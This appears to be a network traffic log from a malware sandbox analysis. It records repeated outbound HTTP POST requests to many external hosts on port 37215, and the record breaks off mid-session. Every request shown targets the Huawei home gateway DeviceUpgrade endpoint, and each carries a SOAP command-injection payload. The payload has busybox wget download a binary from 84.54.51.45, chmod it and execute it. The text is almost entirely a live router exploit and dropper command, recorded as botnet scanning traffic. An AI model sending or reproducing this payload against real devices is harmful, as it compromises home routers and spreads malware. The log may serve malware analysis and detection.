                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2382192.168.2.155392041.19.50.2037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808881998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2383192.168.2.153998241.120.6.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808909893 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2384192.168.2.153704641.5.180.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808929920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2385192.168.2.153737441.24.29.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808952093 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2386192.168.2.154774841.161.170.19237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.808980942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2387192.168.2.155019841.220.158.9637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.809039116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2388192.168.2.153710041.241.160.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.809087992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2389192.168.2.155473641.202.37.5237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.809128046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2390192.168.2.154976441.208.227.4237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810189962 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2391192.168.2.153997841.254.215.19637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.810193062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
